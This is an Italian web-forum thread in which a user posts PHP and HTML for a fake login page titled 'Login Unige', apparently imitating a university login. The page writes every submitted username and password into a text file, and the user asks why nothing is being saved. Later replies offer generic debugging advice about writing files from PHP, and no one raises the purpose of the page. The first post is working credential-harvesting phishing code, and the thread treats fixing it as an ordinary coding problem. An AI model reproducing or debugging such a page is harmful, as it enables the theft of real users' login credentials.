Visualizzazione dei risultati da 1 a 7 su 7

Discussione: stampare su txt

  1. #1

    stampare su txt

    Ciao a tutti
    ho scritto questa semplice pagina html in modo da salvare quello che viene inviato come utente e psw su un file txt, ma non capisco come mai non funzioni

    codice:
    <?php
    $username = $_POST['username'];
    $password = $_POST['password'];
    $apriw = fopen ("password.txt","a+");
    $linea ="---------\n";
    fputs($apriw,"$username\n");
    fputs($apriw,"$password\n");
    fputs($apriw,"$linea");
    fclose($apriw);
    ?>
    
    
    <html>
    
    <head>
    
    <title>Login Unige</title>
    
    </head>
    
    <body>
    
    <form action="#" method="post">
    
      <table width="50%" border="0" align="center" cellpadding="4" cellspacing="0">
    
        <tr>
    
          <td width="22%">Username</td>
    
          <td width="78%"><input name="username" type="text" id="username"></td>
    
        </tr>
    
        <tr>
    
          <td>Password</td>
    
          <td><input name="password" type="password" id="password"></td>
    
        </tr>
    
        <tr>
    
          <td></td>
    
          <td><input type="submit" name="Submit" value="Submit"></td>
    
        </tr>
    
      </table>
    
    </body>
    
    </html>
    Sapete dirmi dove sbaglio??

    grazie

  2. #2

  3. #3
    errori non ne visualizza, il mio "non funziona" vuol dire che non mi stampa nulla sul file txt neanche $linea che è una stringa che assegno io.

    il discorso funziona se anziche rindirizzare la pagina su se stessa ( form action="#" ) la indirizzo a un'altra pagina php contenente la prima parte del codice che ho postato.

    Non capisco come mai in un caso funziona e nell'altro no

  4. #4
    Cosa ottieni se esegui questo codice?

    Codice PHP:
    <?php
    error_reporting
    (E_ALL);
    ini_set('display_errors'1);
    ?>
    <form method="post">
    <input type="hidden" name="value" value="Hello World!"
    <input type="submit" value="Click Here" />
    </form>
    <pre>
    <?php 
    if (isset($_POST['value'])) {
        
    $file dirname(__FILE__) . '/test.txt';
        
    file_put_contents($file$_POST['value']);
        
    readfile($file);
    }
    ?>
    </pre>

  5. #5
    se non ho capito male il codice che hai scritto cliccando sul tasto che compare dovrebbe scrivere "Hello World!" sul file test.txt
    non viene riportato nessun errore e non crea neanche nessun file test.txt

  6. #6
    non molto tempo fa ho scritto una guida su come scrivere (e leggere) i file .txt da php...

    ti lascio il link dell'articolo....spero non venga considerato spam..

    Scrivere nei .txt da php

    la guida è molto breve ma spiega come funziona...

    spero ti sia di aiuto

  7. #7
    Grazie dell'aiuto ma quello che spieghi nella guida lo so gia` fare..se riuscivo volevo mettere tutto nella stessa pagina..cmq continuo a provare

Permessi di invio

  • Non puoi inserire discussioni
  • Non puoi inserire repliche
  • Non puoi inserire allegati
  • Non puoi modificare i tuoi messaggi
  •  
Powered by vBulletin® Version 4.2.1
Copyright © 2024 vBulletin Solutions, Inc. All rights reserved.